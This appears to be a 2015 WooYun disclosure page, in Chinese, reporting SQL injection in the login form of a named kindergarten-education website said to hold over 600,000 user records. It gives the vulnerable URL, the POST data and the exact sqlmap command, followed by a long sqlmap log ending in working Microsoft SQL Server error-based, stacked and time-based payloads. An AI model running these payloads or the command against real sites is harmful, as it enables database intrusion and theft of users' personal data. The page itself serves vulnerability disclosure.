当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147543

漏洞标题:凯尔幼教联盟网POST SQL注入漏洞(涉及60W+用户信息)

相关厂商:凯尔幼教联盟网

漏洞作者: 路人甲

提交时间:2015-10-19 09:43

修复时间:2015-12-03 09:44

公开时间:2015-12-03 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

凯尔幼教联盟网POST SQL注入漏洞(涉及60W+用户信息)

详细说明:

注入点:
http://www.krbb.cn/login/chklogin.asp
POST数据:uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634
sqlmap语句:
python sqlmap.py -u "http://www.krbb.cn/login/chklogin.asp" --data "uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634"
sqlmap截图:

1.jpg


USER表太多了 检测了一个
Database: www_krbb_cn
+-------------+---------+
| Table | Entries |
+-------------+---------+
| dbo.Dv_User | 612629 |
所有用户的话 肯定进百万了

漏洞证明:

sqlmap全过程

[11:21:38] [INFO] testing connection to the target URL
[11:21:38] [INFO] heuristics detected web page charset 'GB2312'
[11:21:39] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[11:21:40] [INFO] target URL is stable
[11:21:40] [INFO] testing if POST parameter 'uid' is dynamic
[11:21:41] [WARNING] POST parameter 'uid' does not appear dynamic
[11:21:41] [WARNING] heuristic (basic) test shows that POST parameter 'uid' migh
t not be injectable
[11:21:41] [INFO] testing for SQL injection on POST parameter 'uid'
[11:21:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:21:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:21:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:21:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:21:49] [INFO] testing 'MySQL inline queries'
[11:21:49] [INFO] testing 'PostgreSQL inline queries'
[11:21:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:21:49] [INFO] testing 'Oracle inline queries'
[11:21:50] [INFO] testing 'SQLite inline queries'
[11:21:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:21:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:21:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:21:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:21:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:22:00] [INFO] testing 'Oracle AND time-based blind'
[11:22:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:22:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:22:23] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[11:22:40] [WARNING] POST parameter 'uid' is not injectable
[11:22:40] [INFO] testing if POST parameter 'pwd' is dynamic
[11:22:40] [WARNING] POST parameter 'pwd' does not appear dynamic
[11:22:40] [WARNING] heuristic (basic) test shows that POST parameter 'pwd' migh
t not be injectable
[11:22:40] [INFO] testing for SQL injection on POST parameter 'pwd'
[11:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:22:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:22:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:22:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:22:54] [INFO] testing 'MySQL inline queries'
[11:22:54] [INFO] testing 'PostgreSQL inline queries'
[11:22:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:22:55] [INFO] testing 'Oracle inline queries'
[11:22:55] [INFO] testing 'SQLite inline queries'
[11:22:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:22:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:23:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:23:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:23:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:23:04] [INFO] testing 'Oracle AND time-based blind'
[11:23:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:23:42] [WARNING] POST parameter 'pwd' is not injectable
[11:23:42] [INFO] testing if POST parameter 'cookieexists' is dynamic
[11:23:43] [WARNING] POST parameter 'cookieexists' does not appear dynamic
[11:23:43] [WARNING] heuristic (basic) test shows that POST parameter 'cookieexi
sts' might not be injectable
[11:23:43] [INFO] testing for SQL injection on POST parameter 'cookieexists'
[11:23:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:23:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:23:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:23:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:23:55] [INFO] testing 'MySQL inline queries'
[11:23:55] [INFO] testing 'PostgreSQL inline queries'
[11:23:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:23:56] [INFO] testing 'Oracle inline queries'
[11:23:56] [INFO] testing 'SQLite inline queries'
[11:23:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:23:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:24:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:24:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:24:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:24:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:24:09] [INFO] testing 'Oracle AND time-based blind'
[11:24:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:24:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:24:48] [WARNING] POST parameter 'cookieexists' is not injectable
[11:24:48] [INFO] testing if POST parameter 'yhm' is dynamic
[11:24:48] [WARNING] POST parameter 'yhm' does not appear dynamic
[11:24:48] [WARNING] heuristic (basic) test shows that POST parameter 'yhm' migh
t not be injectable
[11:24:48] [INFO] testing for SQL injection on POST parameter 'yhm'
[11:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:24:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:24:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:24:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:24:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:24:59] [INFO] testing 'MySQL inline queries'
[11:24:59] [INFO] testing 'PostgreSQL inline queries'
[11:24:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:24:59] [INFO] testing 'Oracle inline queries'
[11:24:59] [INFO] testing 'SQLite inline queries'
[11:24:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:25:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:25:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:25:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:25:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:25:08] [INFO] testing 'Oracle AND time-based blind'
[11:25:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:25:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:25:50] [WARNING] POST parameter 'yhm' is not injectable
[11:25:50] [INFO] testing if POST parameter 'leixing' is dynamic
[11:25:50] [WARNING] POST parameter 'leixing' does not appear dynamic
[11:25:50] [WARNING] heuristic (basic) test shows that POST parameter 'leixing'
might not be injectable
[11:25:51] [INFO] testing for SQL injection on POST parameter 'leixing'
[11:25:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:25:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:25:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:26:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:26:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:26:04] [INFO] testing 'MySQL inline queries'
[11:26:05] [INFO] testing 'PostgreSQL inline queries'
[11:26:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:26:05] [INFO] testing 'Oracle inline queries'
[11:26:06] [INFO] testing 'SQLite inline queries'
[11:26:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:26:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:26:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:26:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:26:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:26:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:26:14] [INFO] testing 'Oracle AND time-based blind'
[11:26:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:26:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:26:51] [WARNING] POST parameter 'leixing' is not injectable
[11:26:51] [INFO] testing if POST parameter 'mm' is dynamic
[11:26:51] [WARNING] POST parameter 'mm' does not appear dynamic
[11:26:51] [INFO] heuristic (basic) test shows that POST parameter 'mm' might be
 injectable (possible DBMS: 'Microsoft SQL Server')
[11:26:51] [INFO] testing for SQL injection on POST parameter 'mm'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n]
[11:27:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[11:27:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:27:34] [INFO] POST parameter 'mm' is 'Microsoft SQL Server/Sybase AND error-
based - WHERE or HAVING clause' injectable
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:28:15] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase s
tacked queries' injectable
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[11:29:09] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase A
ND time-based blind (heavy query)' injectable
[11:29:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:09] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:29:10] [WARNING] reflective value(s) found and filtering out
[11:29:10] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[11:29:11] [INFO] target URL appears to have 12 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[11:29:31] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'mm' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 1285 HTTP(s) re
quests:
---
Parameter: mm (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1
&mm=88952634' AND 3331=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)
+CHAR(113)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR
(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'NukJ'='NukJ
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1
&mm=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1
&mm=88952634' AND 5957=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,s
ysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS s
ys7) AND 'RLxS'='RLxS
---
[11:29:33] [INFO] testing Microsoft SQL Server
[11:29:33] [INFO] confirming Microsoft SQL Server
[11:29:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)